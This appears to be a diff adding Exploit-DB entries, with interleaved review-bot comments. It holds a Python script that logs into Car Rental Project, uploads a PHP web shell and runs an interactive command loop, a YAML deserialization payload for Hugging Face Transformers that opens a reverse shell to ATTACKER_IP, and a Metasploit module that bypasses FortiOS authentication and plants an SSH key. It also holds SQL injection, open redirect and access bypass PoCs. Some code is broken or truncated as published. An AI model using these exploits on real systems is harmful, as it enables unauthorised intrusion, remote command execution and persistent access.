# Exploit Title: phpMyFAQ v3.2.10 - Unintended File Download Triggered by Embedded Frames
|
||||
# Date: 13 Dec 2024
|
||||
# Exploit Author: George Chen
|
||||
# Vendor Homepage: https://github.com/thorsten/phpMyFAQ/
|
||||
# Software Link: https://github.com/thorsten/phpMyFAQ/
|
||||
# Version: v3.2.10
|
||||
# Tested on: Mac, Win
|
||||
# CVE : CVE-2024–55889
|
||||
|
||||
|
||||
*Summary*
|
||||
A vulnerability exists in the FAQ Record component of
|
||||
https://github.com/thorsten/phpMyFAQ v3.2.10 where a privileged attacker
|
||||
can trigger a file download on a victim’s machine upon page visit by
|
||||
embedding it in an <iframe> element without user interaction or explicit
|
||||
consent.
|
||||
|
||||
*Details*
|
||||
In http://localhost/admin/index.php?action=editentry&id=20&lang=en, where a
|
||||
FAQ record is either created or edited, an attacker can insert an iframe,
|
||||
as “source code”, pointing to a prior “malicious” attachment that the
|
||||
attacker has uploaded via FAQ “new attachment” upload, such that any page
|
||||
visits to this FAQ will trigger an automated download (from the edit
|
||||
screen, download is automated; from the faq page view as a normal user,
|
||||
depending on the browser, a pop up confirmation may be presented before the
|
||||
actual download. Firebox browser, for instance, does not require any
|
||||
interactions).
|
||||
|
||||
[image: image.png]
|
||||
|
||||
*PoC*
|
||||
|
||||
1. create a new FAQ record and upload a “malicious” file — in my case, I
|
||||
uploaded an eicar file. Take note of the uri, ie
|
||||
“index.php?action=attachment&id=2”
|
||||
2. in the FAQ record, insert a “source code” blob using the “< >” button
|
||||
3. insert in the following snippet and save FAQ record:
|
||||
<p><iframe src="index.php?action=attachment&id=2"></iframe></p> [image:
|
||||
image.png]
|
||||
4. Once the edit page reloads, the malicious code will be downloaded
|
||||
onto the local machine without user interaction:[image: image.png]
|
||||
|
||||
Advisory:
|
||||
https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-m3r7-8gw7-qwvc
|
||||
Disclosure: https://geochen.medium.com/cve-2024-55889-03572ae6c35c
|
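Review bot: the CVE line is written with an en dash, "CVE-2024–55889"; it must be an ASCII hyphen so the identifier matches the CVE record and searches find it. "Firebox browser" in the Details paragraph is presumably Firefox. The three "[image: image.png]" markers are leftovers of the e-mail this was pasted from and convey nothing here; drop them or replace each with a sentence describing what the screenshot showed, and in step 3 the snippet "<p><iframe src="index.php?action=attachment&id=2"></iframe></p>" should stand on its own line rather than run into a marker. The Summary says the attacker must be "privileged" (able to create or edit FAQ records); that precondition belongs in the header block next to the title.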
91
exploits/php/webapps/52243.py
Executable file
|
@ -0,0 +1,91 @@
|
|||
# Exploit Title: Car Rental Project 1.0 - Remote Code Execution
|
||||
# Date: 1/3/2020
|
||||
# Exploit Author: FULLSHADE, SC
|
||||
# Vendor Homepage: https://phpgurukul.com/
|
||||
# Software Link: https://phpgurukul.com/car-rental-project-php-mysql-free-download/
|
||||
# Version: 1.0
|
||||
# Tested on: Windows
|
||||
# CVE : CVE-2020-5509
|
||||
# ==================================================
|
||||
# Information & description
|
||||
# ==================================================
|
||||
# Car Rental Project v.1.0 is vulnerable to arbitrary file upload since an admin can change the image of a product and the file change PHP code doesn't validate or care what type of file is submitted, which leads to an attack having the ability to upload malicious files. This Python POC will execute arbitrary commands on the remote server.
|
||||
# ==================================================
|
||||
# Manual POC
|
||||
# ==================================================
|
||||
# Manual POC method
|
||||
# - Visit carrental > admin login > changeimage1.php
|
||||
# - Upload a php rce vulnerable payload
|
||||
# - Visit /carrentalproject/carrental/admin/img/vehicleimages/.php to visit your file
|
||||
# - Execute commands on the server
|
||||
# ==================================================
|
||||
# POC automation script
|
||||
# ==================================================
|
||||
|
||||
import sys
|
||||
import requests
|
||||
|
||||
print("""
|
||||
+-------------------------------------------------------------+
|
||||
Car Rental Project v1.0 - Remote Code Execution
|
||||
FULLSHADE, FullPwn Operations
|
||||
+-------------------------------------------------------------+
|
||||
""")
|
||||
|
||||
def login():
|
||||
sessionObj = requests.session()
|
||||
RHOSTS = sys.argv[1]
|
||||
bigstring = "\n+-------------------------------------------------------------+\n"
|
||||
print("+-------------------------------------------------------------+")
|
||||
print("[+] Victim host: {}".format(RHOSTs))
|
||||
POST_AUTH_LOGIN = "http://" + RHOSTS + "/carrentalproject/carrental/admin/index.php"
|
||||
SHELL_UPLOAD_URL = "http://" + RHOSTS + "/carrentalproject/carrental/admin/changeimage1.php"
|
||||
|
||||
# login / authentication
|
||||
payload = {"username": "admin", "password": "Test@12345", "login": ""}
|
||||
login = sessionObj.post(POST_AUTH_LOGIN, data=payload)
|
||||
|
||||
# get response
|
||||
if login.status_code == 200:
|
||||
print("[+] Login HTTP response code: 200")
|
||||
print("[+] Successfully logged in")
|
||||
else:
|
||||
print("[!] Failed to authenticate")
|
||||
sys.exit()
|
||||
|
||||
# get session token
|
||||
session_cookie_dic = sessionObj.cookies.get_dict()
|
||||
token = session_cookie_dic["PHPSESSID"]
|
||||
print("[+] Session cookie: {}".format(token))
|
||||
|
||||
# proxy for Burp testing
|
||||
proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}
|
||||
|
||||
# data for uploading the backdoor request
|
||||
backdoor_file = {
|
||||
"img1": (
|
||||
"1dccadfed7bcbb036c56a4afb97e906f.php",
|
||||
'<?php system($_GET["cmd"]); ?>',
|
||||
"Content-Type application/x-php",
|
||||
)
|
||||
}
|
||||
backdoor_data = {"update": ""}
|
||||
SHELL_UPLOAD_URL = "http://" + RHOSTS + "/carrentalproject/carrental/admin/changeimage1.php"
|
||||
|
||||
# actually upload the php shell
|
||||
try:
|
||||
r = sessionObj.post(url=SHELL_UPLOAD_URL, files=backdoor_file, data=backdoor_data)
|
||||
print("[+] Backdoor upload at /carrentalproject/carrental/admin/img/vehicleimages/1dccadfed7bcbb036c56a4afb97e906f.php" + bigstring)
|
||||
except:
|
||||
print("[!] Failed to upload backdoor")
|
||||
|
||||
# get command execution
|
||||
while True:
|
||||
COMMAND = str(input('\033[32m' + "Command RCE >> " + '\033[m'))
|
||||
SHELL_LOCATION = "http://" + RHOSTS + "/carrentalproject/carrental/admin/img/vehicleimages/1dccadfed7bcbb036c56a4afb97e906f.php"
|
||||
# get R,CE results
|
||||
respond = sessionObj.get(SHELL_LOCATION + "?cmd=" + COMMAND)
|
||||
print(respond.text)
|
||||
|
||||
if __name__ == "__main__":
|
||||
login()
|
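Review bot: `print("[+] Victim host: {}".format(RHOSTs))` references `RHOSTs`, but the variable assigned two lines earlier is `RHOSTS`, so the script dies with NameError before it ever logs in. The login check `if login.status_code == 200` is not a success test, since the login page answers 200 to wrong credentials as well; check for the redirect or for admin page content instead, and the hardcoded "admin" / "Test@12345" pair should come from the command line like RHOSTS. `proxies` is defined but never passed to any request, `SHELL_UPLOAD_URL` is assigned twice with the same value, and the bare `except:` around the upload catches everything including KeyboardInterrupt; catch requests.RequestException.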
15
exploits/php/webapps/52245.txt
Normal file
|
@ -0,0 +1,15 @@
|
|||
# Exploit Title: KodExplorer 4.52 - Open Redirect
|
||||
# Date: 2024-11-08
|
||||
# Exploit Author: Rahad Chowdhury
|
||||
# Vendor Homepage: https://kodcloud.com/
|
||||
# Software Link: https://github.com/kalcaddle/KodExplorer/releases/tag/4.52
|
||||
# Version: 4.52
|
||||
# Tested on: Windows 10, PHP 8.2.4, Apache 2.4.56
|
||||
|
||||
*Steps to Reproduce:*
|
||||
|
||||
1. At first visit this url http://target.com/index.php?user/login&link=.
|
||||
2. Then use any malicious url in link parameter.
|
||||
3. your link will be look like:
|
||||
http://target.com/index.php?user/login&link=https://{site}.com
|
||||
4. login your account and you will redirect to malicious url.
|
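Review bot: the header block has no CVE or reference line, so the finding cannot be cross-checked. In step 1 the URL is printed as "http://target.com/index.php?user/login&link=." with the sentence's full stop glued to the parameter; move the period off the URL. Step 3's "https://{site}.com" is an unlabelled placeholder, and step 4 ("login your account and you will redirect") shows that the redirect only fires after a successful login; that precondition belongs in the description rather than being implied by the last step.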
52
exploits/php/webapps/52247.txt
Normal file
|
@ -0,0 +1,52 @@
|
|||
# Exploit Title: Smart Manager 8.27.0 - Post-Authenticated SQL Injection
|
||||
# Date: 2024-01-18
|
||||
# Exploit Author: Ivan Spiridonov - xbz0n
|
||||
# Vendor Homepage: https://www.storeapps.org/
|
||||
# Software Link: https://www.storeapps.org/product/smart-manager/
|
||||
# Version: 8.27.0
|
||||
# Tested on: Ubuntu 22.04
|
||||
# CVE: CVE-2024-0566
|
||||
|
||||
## SQL Injection
|
||||
|
||||
The plugin does not properly sanitize and escape a parameter before using it in an SQL statement, leading to an SQL injection exploitable by high-privilege users such as admin.
|
||||
|
||||
## Affected Components
|
||||
|
||||
- **Plugin:** Smart Manager
|
||||
- **Version:** 8.27.0
|
||||
- **Affected Parameters:** 'sort_params%5BsortOrder%5D', 'sort_params%5Bcolumn%5D'
|
||||
- **Affected Endpoint:** /wp-admin/admin-ajax.php
|
||||
|
||||
## Description
|
||||
|
||||
The vulnerability is located within the admin AJAX endpoint in the sorting parameters 'sort_params%5BsortOrder%5D' and 'sort_params%5Bcolumn%5D'. By manipulating these parameters, authenticated attackers can inject SQL commands, leading to a time-based SQL Injection vulnerability.

## Proof of Concept

### Manual Exploitation

```http
POST /wp-admin/admin-ajax.php?action=sm_beta_include_file HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://localhost/wp-admin/admin.php?page=smart-manager
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 1117
Origin: http://localhost
Connection: close
Cookie: Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
cmd=get_data_model&active_module=product&security=37e8d818b7&is_public=1&sm_page=1&sm_limit=50&SM_IS_WOO30=true&sort_params%5Bcolumn%5D=postmeta%2Fmeta_key%3D_tax_status%2Fmeta_value%3D_tax_status&sort_params%5BsortOrder%5D=asc%2c(select*from(select(sleep(20)))a)&table_model%5Bposts%5D%5Bpkey%5D=ID&table_model%5Bposts%5D%5Bjoin_on%5D=&table_model%5Bposts%5D%5Bwhere%5D%5Bpost_type%5D%5B%5D=product&table_model%5Bposts%5D%5Bwhere%5D%5Bpost_type%5D%5B%5D=product_variation&table_model%5Bposts%5D%5Bwhere%5D%5Bpost_status%5D=any&table_model%5Bpostmeta%5D%5Bpkey%5D=post_id&table_model%5Bpostmeta%5D%5Bjoin_on%5D=postmeta.post_ID+%3D+posts.ID&table_model%5Bterm_relationships%5D%5Bpkey%5D=object_id&table_model%5Bterm_relationships%5D%5Bjoin_on%5D=term_relationships.object_id+%3D+posts.ID&table_model%5Bterm_taxonomy%5D%5Bpkey%5D=term_taxonomy_id&table_model%5Bterm_taxonomy%5D%5Bjoin_on%5D=term_taxonomy.term_taxonomy_id+%3D+term_relationships.term_taxonomy_id&table_model%5Bterms%5D%5Bpkey%5D=term_id&table_model%5Bterms%5D%5Bjoin_on%5D=terms.term_id+%3D+term_taxonomy.term_id&search_text=&advanced_search_query=%5B%5D&is_view=0&isTasks=0&is_taxonomy=0
```

If the server response is delayed by approximately 20 seconds, it indicates a successful exploitation of the time-based SQL Injection, confirming the vulnerability.

## Recommendations

Users of Smart Manager v8.27.0 are strongly advised to restrict access to the affected endpoint and update the plugin to the latest version.
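Review bot: The `Cookie:` header in the PoC request has lost its value and absorbed the `Sec-Fetch-Dest: empty` header (`Cookie: Sec-Fetch-Dest: empty`), so the request as published carries no WordPress session even though the description says the injection requires an authenticated user; restore a clearly marked placeholder cookie value and put `Sec-Fetch-Dest: empty` on its own line. The Recommendations section should also name the plugin release that fixes the issue instead of "the latest version", so readers can verify they are patched.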
31
exploits/python/remote/52227.txt
Normal file
@ -0,0 +1,31 @@
# Exploit Title: Hugging Face Transformers MobileViTV2 RCE
# Date: 29-11-2024
# Exploit Author: The Kernel Panic
# Vendor Homepage: https://huggingface.co/
# Software Link: https://github.com/huggingface/transformers/releases
# Version: 4.41.1
# Tested on: Linux, Windows, Mac
# CVE : CVE-2024-11392


# Code flow from input to the vulnerable condition:
# 1. The user downloads a third-party ml-cvnet model alongside its configuration file.
# 2. The user runs the convert_mlcvnets_to_pytorch.py script and passes the configuration file to it.
# 3. The convert_mlcvnets_to_pytorch.py script de-serializes the configuration file and executes the malicious code.


# POC

# Create a malicious yaml configuration file called "transformers_exploit.yaml" like shown below.
# Note: Remember to change the 'ATTACKER_IP' and 'ATTACKER_PORT'.

!!python/object/new:type
args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
listitems: "__import__('socket').socket(socket.AF_INET, socket.SOCK_STREAM).connect(('ATTACKER_IP', ATTACKER_PORT));import os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ATTACKER_IP',ATTACKER_PORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn('/bin/bash')"


# Run the convert_mlcvnets_to_pytorch.py script and pass the transformers_exploit.yaml file to --orig_config_path

> python convert_mlcvnets_to_pytorch.py --orig_checkpoint_path dummy_checkpoint.pt --or

# Note: The dummy_checkpoint.pt can be left as an empty file, dummy_output as an empty directory , and "task" as any of the options metioned in the script.
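Review bot: The reproduction command on the `> python convert_mlcvnets_to_pytorch.py ...` line is cut off after `--or`, so the PoC cannot be followed as published; the full argument list (the `--orig_config_path` flag the preceding comment names, plus the output directory and task options the trailing note refers to) needs to be restored before this is merged. The header claims "Tested on: Linux, Windows, Mac", but the payload depends on `pty` and `/bin/bash`, which are not available on Windows, so the claim should be qualified; "metioned" in the last note should read "mentioned".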
16
exploits/windows/remote/52237.txt
Normal file
@ -0,0 +1,16 @@
# Exploit Title: WebMethods Integration Server 10.15.0.0000-0092 - Improper Access on Login Page
# Date: 25-01-2024
# Exploit Author: Rasime Ekici
# Vendor Homepage: www.softwareag.com
# Version: 10.15.0000-0092
# Tested on: 10.15.0000-0092
# CVE : 2024-23733

Description:

The /WmAdmin/,/invoke/vm.server/login login page in the Integration Server in Software AG webMethods 10.15.0 before Core Fix7 allows remote attackers to reach the administration panel,discovering server hostname and version information by sending arbitary username and blank password to the /WmAdmin/#/login/ uri

Interpret the http traffic and send a dummy username with blank password on login screen and drop the request to "/admin/navigation/license" to not logged out.Thus you may able to see:
-real hostname of the installed server
-version info
-administrative api endpoints
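Review bot: The `# CVE : 2024-23733` header omits the `CVE-` prefix that every other entry in this commit uses, which will trip tooling that parses the header block; write `CVE-2024-23733`. The Description also needs a proofread before merge ("arbitary", "to not logged out", "you may able to see"), and "Tested on" repeats the version string rather than naming a platform as the other entries do.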
279
exploits/windows/remote/52239.py
Executable file
@ -0,0 +1,279 @@
# Exploit Title: Fortinet FortiOS, FortiProxy, and FortiSwitchManager 7.2.0 - Authentication bypass
# Date: 2022-10-10
# Exploit Author: Zach Hanley, SC
# Vendor Homepage: https://www.fortinet.com
# Version: 7.0.0
# Tested on: Linux
# CVE : CVE-2022-40684


##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::SSH
prepend Msf::Exploit::Remote::AutoCheck

attr_accessor :ssh_socket
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Fortinet FortiOS, FortiProxy, and FortiSwitchManager authentication bypass.',
'Description' => %q{
This module exploits an authentication bypass vulnerability
in the Fortinet FortiOS, FortiProxy, and FortiSwitchManager API
to gain access to a chosen account. And then add a SSH key to the
authorized_keys file of the chosen account, allowing
to login to the system with the chosen account.

Successful exploitation results in remote code execution.
},
'Author' => [
'Heyder Andrade <@HeyderAndrade>', # Metasploit module
'Zach Hanley <@hacks_zach>', # PoC
],
'References' => [
['CVE', '2022-40684'],
['URL', 'https://www.fortiguard.com/psirt/FG-IR-22-377'],
['URL', 'https://www.horizon3.ai/fortios-fortiproxy-and-fortiswitchmanager-authentication-bypass-technical-deep-dive-cve-2022-40684'],
],
'License' => MSF_LICENSE,
'DisclosureDate' => '2022-10-10', # Vendor advisory
'Platform' => ['unix', 'linux'],
'Arch' => [ARCH_CMD],
'Privileged' => true,
'Targets' => [
[
'FortiOS',
{
'DefaultOptions' => {
'PAYLOAD' => 'generic/ssh/interact'
},
'Payload' => {
'Compat' => {
'PayloadType' => 'ssh_interact'
}
}
}
]
],
'DefaultTarget' => 0,
'DefaultOptions' => {
'RPORT' => 443,
'SSL' => true
},
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [
IOC_IN_LOGS,
ARTIFACTS_ON_DISK # SSH key is added to authorized_keys file
]
}
)
)

register_options(
[
OptString.new('TARGETURI', [true, 'The base path to the Fortinet CMDB API', '/api/v2/cmdb/']),
OptString.new('USERNAME', [false, 'Target username (Default: auto-detect)', nil]),
OptString.new('PRIVATE_KEY', [false, 'SSH private key file path', nil]),
OptString.new('KEY_PASS', [false, 'SSH private key password', nil]),
OptString.new('SSH_RPORT', [true, 'SSH port to connect to', 22]),
OptBool.new('PREFER_ADMIN', [false, 'Prefer to use the admin user if one is detected', true])
]
)
end


def username
if datastore['USERNAME']
@username ||= datastore['USERNAME']
else
@username ||= detect_username
end
end

def ssh_rport
datastore['SSH_RPORT']
end

def current_keys
@current_keys ||= read_keys
end

def ssh_keygen
# ssh-keygen -t rsa -m PEM -f `openssl rand -hex 8`
if datastore['PRIVATE_KEY']
@ssh_keygen ||= Net::SSH::KeyFactory.load_data_private_key(
File.read(datastore['PRIVATE_KEY']),
datastore['KEY_PASS'],
datastore['PRIVATE_KEY']
)
else
@ssh_keygen ||= OpenSSL::PKey::EC.generate('prime256v1')
end
end

def ssh_private_key
ssh_keygen.to_pem
end

def ssh_pubkey
Rex::Text.encode_base64(ssh_keygen.public_key.to_blob)
end

def authorized_keys
pubkey = Rex::Text.encode_base64(ssh_keygen.public_key.to_blob)
"#{ssh_keygen.ssh_type} #{pubkey} #{username}@localhost"
end

def fortinet_request(params = {})
send_request_cgi(
{
'ctype' => 'application/json',
'agent' => 'Report Runner',
'headers' => {
'Forwarded' => "for=\"[127.0.0.1]:#{rand(1024..65535)}\";by=\"[127.0.0.1]:#{rand(1024..65535)}\""
}
}.merge(params)
)
end

def check
vprint_status("Checking #{datastore['RHOST']}:#{datastore['RPORT']}")
# a normal request to the API should return a 401
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, Rex::Text.rand_text_alpha_lower(6)),
'ctype' => 'application/json'
})

return CheckCode::Unknown('Target did not respond to check.') unless res
return CheckCode::Safe('Target seems not affected by this vulnerability.') unless res.code == 401

# Trying to bypasss the authentication and get the sshkey from the current targeted user it should return a 200 if vulnerable
res = fortinet_request({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, '/system/status')
})

return CheckCode::Safe unless res&.code == 200

version = res.get_json_document['version']

print_good("Target is running the version #{version}, which is vulnerable.")

Socket.tcp(rhost, ssh_rport, connect_timeout: datastore['SSH_TIMEOUT']) { |sock| return CheckCode::Safe('However SSH is not open, so adding a ssh key wouldn\t give you access to the host.') unless sock }

CheckCode::Vulnerable('And SSH is running which makes it exploitable.')
end

def cleanup
return unless ssh_socket

# it assumes our key is the last one and set it to a random text. The API didn't respond to DELETE method
data = {
"ssh-public-key#{current_keys.empty? ? '1' : current_keys.size}" => '""'
}

fortinet_request({
'method' => 'PUT',
'uri' => normalize_uri(target_uri.path, '/system/admin/', username),
'data' => data.to_json
})
end

def detect_username
vprint_status('User auto-detection...')
res = fortinet_request(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, '/system/admin')
)
users = res.get_json_document['results'].collect { |e| e['name'] if (e['accprofile'] == 'super_admin' && e['trusthost1'] == '0.0.0.0 0.0.0.0') }.compact
# we prefer to use admin, but if it doesn't exist we chose a random one.
if datastore['PREFER_ADMIN']
vprint_status("PREFER_ADMIN is #{datastore['PREFER_ADMIN']}, but if it isn't found we will pick a random one.")
users.include?('admin') ? 'admin' : users.sample
else
vprint_status("PREFER_ADMIN is #{datastore['PREFER_ADMIN']}, we will get a random that is not the admin.")
(users - ['admin']).sample
end
end

def add_ssh_key
if current_keys.include?(authorized_keys)
# then we'll remove that on cleanup
print_good('Your key is already in the authorized_keys file')
return
end
vprint_status('Adding SSH key to authorized_keys file')
# Adding the SSH key as the last entry in the authorized_keys file
keystoadd = current_keys.first(2) + [authorized_keys]
data = keystoadd.map.with_index { |key, idx| ["ssh-public-key#{idx + 1}", "\"#{key}\""] }.to_h

res = fortinet_request({
'method' => 'PUT',
'uri' => normalize_uri(target_uri.path, '/system/admin/', username),
'data' => data.to_json
})
fail_with(Failure::UnexpectedReply, 'Failed to add SSH key to authorized_keys file.') unless res&.code == 500
body = res.get_json_document
fail_with(Failure::UnexpectedReply, 'Unexpected reponse from the server after adding the key.') unless body.key?('cli_error') && body['cli_error'] =~ /SSH key is good/
end

def read_keys
vprint_status('Reading SSH key from authorized_keys file')
res = fortinet_request({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, '/system/admin/', username)
})
fail_with(Failure::UnexpectedReply, 'Failed read current SSH keys') unless res&.code == 200
result = res.get_json_document['results'].first
['ssh-public-key1', 'ssh-public-key2', 'ssh-public-key3'].map do |key|
result[key].gsub('"', '') unless result[key].empty?
end.compact
end

def do_login(ssh_options)
# ensure we don't have a stale socket hanging around
ssh_options[:proxy].proxies = nil if ssh_options[:proxy]
begin
::Timeout.timeout(datastore['SSH_TIMEOUT']) do
self.ssh_socket = Net::SSH.start(rhost, username, ssh_options)
end
rescue Rex::ConnectionError
fail_with(Failure::Unreachable, 'Disconnected during negotiation')
rescue Net::SSH::Disconnect, ::EOFError
fail_with(Failure::Disconnected, 'Timed out during negotiation')
rescue Net::SSH::AuthenticationFailed
fail_with(Failure::NoAccess, 'Failed authentication')
rescue Net::SSH::Exception => e
fail_with(Failure::Unknown, "SSH Error: #{e.class} : #{e.message}")
end

fail_with(Failure::Unknown, 'Failed to start SSH socket') unless ssh_socket
end

def exploit
print_status("Executing exploit on #{datastore['RHOST']}:#{datastore['RPORT']} target user: #{username}")
add_ssh_key
vprint_status('Establishing SSH connection')
ssh_options = ssh_client_defaults.merge({
auth_methods: ['publickey'],
key_data: [ ssh_private_key ],
port: ssh_rport
})
ssh_options.merge!(verbose: :debug) if datastore['SSH_DEBUG']

do_login(ssh_options)

handler(ssh_socket)
end
end
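Review bot: `cleanup` picks the slot to blank from `current_keys.size` (or `'1'` when the list is empty), but `add_ssh_key` writes the new key at `current_keys.first(2).size + 1`, so when the account already had exactly one key the module blanks `ssh-public-key1` (the legitimate user's key) and leaves the added key in slot 2, and with two existing keys it blanks slot 2 and leaves slot 3; compute the slot once with the same expression in both places (e.g. `[current_keys.size, 2].min + 1`) and remember it before the PUT so cleanup restores the original state. In `check`, `Socket.tcp` raises on a refused or timed-out connection rather than yielding `nil`, so the `unless sock` branch is dead and the method aborts with an unhandled exception instead of returning `CheckCode::Safe`; rescue the connection errors around that call. Smaller points: the file is a Ruby Metasploit module but is committed as `52239.py`; the header says `# Version: 7.0.0` while the title says 7.2.0; `username` can be `nil` when `detect_username` finds no matching account and is then interpolated into the `/system/admin/` URI with no check; `'wouldn\t'` inside a single-quoted string renders literally; and "bypasss" and "reponse" are typos.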

@ -3259,6 +3259,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
36813,exploits/hardware/local/36813.txt,"ADB - Backup Archive File Overwrite Directory Traversal",2015-04-21,"Imre Rad",local,hardware,,2015-04-21,2015-04-21,0,CVE-2014-7951;OSVDB-120991,,,,,
44983,exploits/hardware/local/44983.txt,"ADB Broadband Gateways / Routers - Local Root Jailbreak",2018-07-05,"SEC Consult",local,hardware,,2018-07-05,2018-07-05,0,CVE-2018-13108,Local,,,,
44984,exploits/hardware/local/44984.txt,"ADB Broadband Gateways / Routers - Privilege Escalation",2018-07-05,"SEC Consult",local,hardware,,2018-07-05,2018-07-05,0,CVE-2018-13110,Local,,,,
52244,exploits/hardware/local/52244.txt,"ASUS ASMB8 iKVM 1.14.51 - Remote Code Execution (RCE)",2025-04-16,ub3rsick,local,hardware,,2025-04-16,2025-04-16,0,CVE-2023-26602,,,,,
40271,exploits/hardware/local/40271.txt,"Cisco ASA / PIX - 'EPICBANANA' Local Privilege Escalation",2016-08-19,"Shadow Brokers",local,hardware,,2016-08-19,2016-09-15,0,CVE-2016-6367,,,,,
30237,exploits/hardware/local/30237.sh,"Cisco Unified Communications Manager - TFTP Service",2013-12-12,"daniel svartman",local,hardware,,2013-12-12,2013-12-18,1,CVE-2013-7030;OSVDB-100916,,,,,
34954,exploits/hardware/local/34954.txt,"Cisco Unified Communications Manager 8.0 - Invalid Argument Privilege Escalation",2010-11-03,"Knud Erik Hjgaard",local,hardware,,2010-11-03,2014-10-14,1,CVE-2010-3039;OSVDB-69158,,,,,https://www.securityfocus.com/bid/44672/info

@ -3279,6 +3280,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
9955,exploits/hardware/local/9955.txt,"Overland Guardian OS 5.1.041 - Local Privilege Escalation",2009-10-20,trompele,local,hardware,,2009-10-19,,1,CVE-2009-4607;OSVDB-61789,,,,,
41745,exploits/hardware/local/41745.txt,"QNAP QTS < 4.2.4 - Domain Privilege Escalation",2017-03-27,"Pasquale Fiorillo",local,hardware,,2017-03-27,2017-03-27,1,CVE-2017-5227;NAS-201703-21,,,,,http://www.ush.it/team/ush/hack-qnap/qnap.txt
32370,exploits/hardware/local/32370.txt,"Quantum vmPRO 3.1.2 - Local Privilege Escalation",2014-03-19,xistence,local,hardware,,2014-03-19,2014-03-19,0,OSVDB-104664,,,,,
52242,exploits/hardware/local/52242.txt,"Ruckus IoT Controller 1.7.1.0 - Undocumented Backdoor Account",2025-04-16,ub3rsick,local,hardware,,2025-04-16,2025-04-16,0,CVE-2021-33216,,,,,
51832,exploits/hardware/local/51832.c,"Saflok - Key Derication Function Exploit",2024-02-28,planthopper3301,local,hardware,,2024-02-28,2024-02-28,0,,,,,,
20999,exploits/hardware/local/20999.c,"Samsung ml85p Printer Driver 1.0 - Insecure Temporary File Creation (1)",2001-07-10,"Charles Stevenson",local,hardware,,2001-07-10,2012-09-02,1,CVE-2001-1177;OSVDB-1898,,,,,https://www.securityfocus.com/bid/3008/info
21000,exploits/hardware/local/21000.sh,"Samsung ml85p Printer Driver 1.0 - Insecure Temporary File Creation (2)",2001-07-10,ml85p,local,hardware,,2001-07-10,2012-09-02,1,CVE-2001-1177;OSVDB-1898,,,,,https://www.securityfocus.com/bid/3008/info

@ -3546,6 +3548,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
15842,exploits/hardware/remote/15842.txt,"DD-WRT 24-preSP2 - Information Disclosure",2010-12-29,"Craig Heffner",remote,hardware,,2010-12-29,2011-09-18,1,OSVDB-70230,,,,,
9209,exploits/hardware/remote/9209.txt,"DD-WRT HTTPd Daemon/Service - Remote Command Execution",2009-07-20,gat3way,remote,hardware,,2009-07-19,2016-10-27,1,OSVDB-57143;CVE-2009-2766;CVE-2009-2765;OSVDB-55990;CVE-2008-6975;OSVDB-55636;CVE-2008-6974,,,,,
7389,exploits/hardware/remote/7389.html,"DD-WRT v24-sp1 - Cross-Site Reference Forgery",2008-12-08,"Michael Brooks",remote,hardware,,2008-12-07,,1,CVE-2008-6975;CVE-2008-6974;OSVDB-55636,,,,,
52246,exploits/hardware/remote/52246.py,"Dell EMC iDRAC7/iDRAC8 2.52.52.52 - Remote Code Execution (RCE)",2025-04-16,Photubias,remote,hardware,,2025-04-16,2025-04-16,0,CVE-2018-1207,,,,,
51248,exploits/hardware/remote/51248.py,"Dell EMC Networking PC5500 firmware versions 4.1.0.22 and Cisco Sx / SMB - Information Disclosure",2023-04-05,"Ken Pyle",remote,hardware,,2023-04-05,2023-04-05,0,CVE-2020-5330;CVE-2019-15993,,,,,
50880,exploits/hardware/remote/50880.txt,"Delta Controls enteliTOUCH 3.40.3935 - Cookie User Password Disclosure",2022-04-19,LiquidWorm,remote,hardware,,2022-04-19,2022-04-19,0,,,,,,
50878,exploits/hardware/remote/50878.html,"Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Request Forgery (CSRF)",2022-04-19,LiquidWorm,remote,hardware,,2022-04-19,2022-04-19,0,,,,,,

@ -4429,6 +4432,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
47979,exploits/hardware/webapps/47979.txt,"Fifthplay S.A.M.I 2019.2_HP - Persistent Cross-Site Scripting",2020-01-29,LiquidWorm,webapps,hardware,,2020-01-29,2020-01-30,0,,"Cross-Site Scripting (XSS)",,,,
47644,exploits/hardware/webapps/47644.py,"FlexAir Access Control 2.3.35 - Authentication Bypass",2019-11-12,LiquidWorm,webapps,hardware,,2019-11-12,2019-11-12,0,CVE-2019-7666,,,,,
47638,exploits/hardware/webapps/47638.sh,"FlexAir Access Control 2.4.9api3 - Remote Code Execution",2019-11-12,LiquidWorm,webapps,hardware,,2019-11-12,2019-11-12,0,,,,,,
52240,exploits/hardware/webapps/52240.py,"FLIR AX8 1.46.16 - Remote Command Injection",2025-04-16,ub3rsick,webapps,hardware,,2025-04-16,2025-04-16,0,CVE-2022-37061,,,,,
45597,exploits/hardware/webapps/45597.txt,"FLIR AX8 Thermal Camera 1.32.16 - Arbitrary File Disclosure",2018-10-15,LiquidWorm,webapps,hardware,,2018-10-15,2018-10-15,0,,,,,,
